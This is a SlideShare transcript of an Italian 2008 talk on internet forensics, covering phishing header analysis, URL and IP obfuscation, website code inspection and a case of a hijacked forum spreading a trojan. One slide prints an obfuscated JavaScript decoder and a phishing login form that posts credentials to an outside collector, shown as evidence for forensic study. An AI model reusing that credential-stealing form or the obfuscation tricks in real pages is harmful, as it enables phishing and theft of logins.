Internet Forensics
Upcoming SlideShare
Loading in...5
×
 

Internet Forensics

on

  • 1,968 views

Internet Forensics

Internet Forensics

Statistics

Views

Total Views
1,968
Views on SlideShare
1,944
Embed Views
24

Actions

Likes
0
Downloads
72
Comments
0

5 Embeds 24

http://www.gianniamato.it 14
http://www.slideshare.net 5
http://www.linkedin.com 3
http://www.lmodules.com 1
https://www.linkedin.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Internet Forensics Internet Forensics Presentation Transcript

  • INTERNET FORENSICS di Gianni Amato 18/06/2008 Convegno CFItaly – Libera Università degli Studi S. Pio V, Roma Gianni Amato http://www.cfitaly.net 1
  • About me (in breve)  Ricercatore indipendente  Pentest & Vulnerability Assessment  Consulente di sicurezza informatica  Collaborazioni Internet Magazine Associazione Meter Gianni Amato http://www.cfitaly.net 2
  • Internet non ha confini!  Chi crede di rimanere anonimo finché non  fornisce i propri dati personali si sbaglia di  grosso. Gianni Amato http://www.cfitaly.net 3
  • Internet Forensics? Reati commessi  Reati commessi  su Internet mediante Internet Gianni Amato http://www.cfitaly.net 4
  • Quali reati?  pedopornografia  terrorismo  phishing  frodi  ...altre tipologie di reato   diffamazioni, violazione della sfera personale,  spam, defacing, intrusioni, malware... Gianni Amato http://www.cfitaly.net 5
  • Iter  Individuare e valutare le cause;  Analizzare e comprendere le  dinamiche;  Documentare e fornire gli indizi; Gianni Amato http://www.cfitaly.net 6
  • Phishing: tutto parte da una  (fake) email (?)  Social Engineering  ..lo studio del comportamento individuale di  una persona al fine di carpire informazioni. Gianni Amato http://www.cfitaly.net 7
  • Come recuperano gli  indirizzi email?  Generati casualmente  Acquistati  Bot a caccia di chiocciole Gianni Amato http://www.cfitaly.net 8
  • Vero o falso? ? Oggetto:  Eseguiamo la manutenzione delle nostre misure di sicurezza Da:  quot;Poste italianequot; <Admin@bancopostaonline.poste.it> Rispondi:  quot;Poste italianequot; <Admin@bancopostaonline.poste.it>  Data:  29/05/2008 18:26 A: guelfoweb@gmail.com  Partiamo dagli headers  Percorso (MTA) seguito dall'email per raggiungerci (Recived:)  disposto in ordine inverso  Data, ora, protocollo, indirizzo ip Gianni Amato http://www.cfitaly.net 9
  • Delivered­To: guelfoweb@gmail.com Received: by 10.142.162.2 with SMTP id k2cs28985wfe;         Thu, 29 May 2008 09:26:09 ­0700 (PDT) Received: by 10.86.54.3 with SMTP id c3mr4230fga.55.1212078368105; H         Thu, 29 May 2008 09:26:08 ­0700 (PDT) e Return­Path: <Admin@bancopostaonline.poste.it> a Received: from smtp21.orange.fr (smtp21.orange.fr [80.12.242.48]) d         by mx.google.com with ESMTP id l12si757120fgb.8.2008.05.29.09.26.04; e         Thu, 29 May 2008 09:26:08 ­0700 (PDT) r Received­SPF: neutral (google.com: 80.12.242.48 is neither permitted nor denied by  best guess record for domain of Admin@bancopostaonline.poste.it) client­ ip=80.12.242.48; Authentication­Results: mx.google.com; spf=neutral (google.com: 80.12.242.48 is  neither permitted nor denied by best guess record for domain of  Admin@bancopostaonline.poste.it) smtp.mail=Admin@bancopostaonline.poste.it Gianni Amato http://www.cfitaly.net 10
  • Received: from User (ks3825.kimsufi.com [213.186.40.121]) by mwinf2114.orange.fr (SMTP Server) with ESMTP id AB8AC1C0011C; Thu, 29 May 2008 18:26:03 +0200 (CEST) X­ME­UUID: 20080529162603702.AB8AC1C0011C@mwinf2114.orange.fr From: quot;Poste italianequot; <Admin@bancopostaonline.poste.it> H e Subject: Eseguiamo la manutenzione delle nostre misure di sicurezza a Date: Thu, 29 May 2008 18:26:03 +0200 d MIME­Version: 1.0 e Content­Type: text/html; r charset=quot;Windows­1251quot; Content­Transfer­Encoding: 7bit X­Priority: 3 X­MSMail­Priority: Normal X­Mailer: Microsoft Outlook Express 6.00.2600.0000 X­MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message­Id: <20080529162603.AB8AC1C0011C@mwinf2114.orange.fr> Gianni Amato http://www.cfitaly.net 11
  • Interrogare i server, i motori di  ricerca e le blacklists  whois  traceroute  blacklist  http://mxtoolbox.com/blacklists.aspx Gianni Amato http://www.cfitaly.net 12
  • Criminali furbi  Fake headers  Proxy anonimi (HTTP Proxy, SOCKS, ecc.)  Relay aperti (SMTP)  Reti WiFi aperte o poco protette  Botnet Gianni Amato http://www.cfitaly.net 13
  • Url encoding  http://www.sitoweb.it/?url=sitotarget.it  http://www.sitoweb.it/?url=%67%6F%6F%67%6C%......  IP : 22.22.22.22  Octal : 0026.0026.0026.0026  Hex : 0x16.0x16.0x16.0x16  Dotless: 370546198 Gianni Amato http://www.cfitaly.net 14
  • Analisi di un sito web  Analisi preliminare  Analisi del codice  Indagini temporali  Indagini avanzate Gianni Amato http://www.cfitaly.net 15
  • Analisi preliminare  Navigare e catalogare il sito  Individuare i collegamenti relativi  es. css e script esterni  Il codice fa la differenza Gianni Amato http://www.cfitaly.net 16
  • Analisi preliminare xss Sfruttare le  vulnerabilità  dei siti web  code  Fake per iniettare  injection codice  arbitrario <iframe> Gianni Amato http://www.cfitaly.net 17
  • Analisi preliminare Gianni Amato Fake http://www.cfitaly.net 18
  • Analisi del codice  Scaricare il codice sorgente in locale  Browser (Firefox, Opera, Internet Explorer)  Amaya  Wget wget ­m ­k http://www.sitoweb.it n.b. fare attenzione ai limiti di banda Gianni Amato http://www.cfitaly.net 19
  • Analisi del codice  Interpretare la struttura del codice  Codice lungo e poco ordinato  Meccanica incomprensibile  soprattutto se il codice è offuscato  Link, tag e formattazioni Gianni Amato http://www.cfitaly.net 20
  • Analisi del codice Javascript  Escape e Unescape;  Base64;  1000 modi per inventarsi una funzione di  codifica; Gianni Amato http://www.cfitaly.net 21
  • Analisi del codice Ok, ora è tutto chiaro !? Gianni Amato http://www.cfitaly.net 22
  • Analisi del codice  Commento  <!­­hppage status­”protected”­­>  Esiste sempre un punto di partenza  document.write(unescape(“%3C%53%43... Gianni Amato http://www.cfitaly.net 23
  • Analisi del codice <SCRIPT LANGUAGE=quot;JavaScriptquot;><!­­ hp_ok=true;function hp_d01(s){if(!hp_ok)return; var o=quot;quot;,ar=new Array(),os=quot;quot;,ic=0; for(i=0;i<s.length;i++){c=s.charCodeAt(i); script code if(c<128)c=c^2; os+=String.fromCharCode(c); if(os.length>80){ar[ic++]=os;os=quot;quot;}}o=ar.join(quot;quot;) +os;document.write(o)}//­­></SCRIPT> <form name=quot;Form_Authquot;  Credential Stealer action=quot;http://www.biohasardz.com/memo/images/1.phpquot;  method=quot;postquot;> ........... Gianni Amato http://www.cfitaly.net 24
  • Analisi del codice  Individuare (se presenti) i metadati  alcuni software utilizzati per lo sviluppo delle  pagine web aggiungono informazioni al codice  Nome del programma utilizzato  Il nome dell'autore autore  Numero di revisioni  Data e ora Gianni Amato http://www.cfitaly.net 25
  • Analisi del codice <!DOCTYPE HTML PUBLIC quot;­//W3C//DTD HTML 4.0 Transitional//ENquot;> <HTML> <HEAD> <META HTTP­EQUIV=quot;CONTENT­TYPEquot; CONTENT=quot;text/html; charset=utf­8quot;> <TITLE></TITLE> <META NAME=quot;GENERATORquot; CONTENT=quot;OpenOffice.org 2.3  (Linux)quot;> <META NAME=quot;AUTHORquot; CONTENT=quot;guelfowebquot;> <META NAME=quot;CREATEDquot; CONTENT=quot;20080614;18464300quot;> <META NAME=quot;CHANGEDBYquot; CONTENT=quot;guelfowebquot;> <META NAME=quot;CHANGEDquot; CONTENT=quot;20080614;18472200quot;> <STYLE TYPE=quot;text/cssquot;> <!­­ @page { size: 21cm 29.7cm; margin: 2cm } P { margin­bottom: 0.21cm } ­­> </STYLE> </HEAD> <BODY LANG=quot;it­ITquot; DIR=quot;LTRquot;> <P STYLE=quot;margin­bottom: 0cmquot;>questa &egrave; una pagina web</P> </BODY> </HTML> Gianni Amato http://www.cfitaly.net 26
  • Analisi del codice  Indizi da non trascurare  Errori  Commenti  Istruzioni commentate Possono fornire importanti informazioni! Gianni Amato http://www.cfitaly.net 27
  • Indagine temporale Evoluzione del sito e vecchi contenuti  The Wayback Machine  archive.org  Google Cache Gianni Amato http://www.cfitaly.net 28
  • Indagine avanzata  Directory listings  Hidden directories  Hidden files  Hidden subdomains Gianni Amato http://www.cfitaly.net 29
  • Indagine avanzata Gianni Amato http://www.cfitaly.net 30
  • Indagine avanzata  Le direttive del file robots.txt  invita gli spiders dei motori di ricerca a non  leggere o non indicizzare determinate pagine  web;  aiuta gli investigatori a individuare i contenuti  che il webmaster ha scelto, per qual si voglia  motivo, di tenere nascosti; Gianni Amato http://www.cfitaly.net 31
  • Indagine avanzata  Non utilizzare tools aggressivi che  potrebbero compromettere il sistema e  di conseguenza infangare le prove Gianni Amato http://www.cfitaly.net 32
  • Case history Associazione Meter – Don Fortunato Di Noto  Dalla pedopornografia al virus passando  per un forum. Gianni Amato http://www.cfitaly.net 33
  • Case history Associazione Meter – Don Fortunato Di Noto  All'interno del forum del sito web (xxx),  oggetto di indagine, sono state rilevate  immagini a carattere pornografico e  pedopornografico Gianni Amato http://www.cfitaly.net 34
  • Case history Associazione Meter – Don Fortunato Di Noto  Dalle indagini è emerso che  il forum era stato abbandonato da quasi 3 anni;  era stato compromesso sfruttando una  vulnerabilità nota della piattaforma di gestione;  erano state inserite delle keywords per scalare  posizione nei motori di ricerca; Gianni Amato http://www.cfitaly.net 35
  • Case history Associazione Meter – Don Fortunato Di Noto  Dalle indagini è emerso che  la presenza di immagini pornografiche e  pedopornografiche era solo un pretesto per  invitare l'utente a cliccarci sopra e scaricare un  trojan che si spacciava per un codec;  il trojan implementava funzionalità di backdoor  che consentiva ai criminali di creare un botnet; Gianni Amato http://www.cfitaly.net 36
  • Case history Associazione Meter – Don Fortunato Di Noto  Dalle indagini è emerso che  il trojan risiedeva su un server straniero;  una volta infettata la macchina, il trojan  comunicava con diversi siti su server stranieri;  le date di registrazione dei siti coincidevano o  differivano di qualche giorno; Gianni Amato http://www.cfitaly.net 37
  • Case history Associazione Meter – Don Fortunato Di Noto  Tra il 2007 e 2008 sono stati individuati 15  casi analoghi  Principali vittime:  Comuni  Scuole  Università Gianni Amato http://www.cfitaly.net 38
  • CONTATTI Gianni Amato  http://www.gianniamato.it E­Mail: gianni@gianniamato.it Cell. +39­3202842382 Gianni Amato http://www.cfitaly.net 39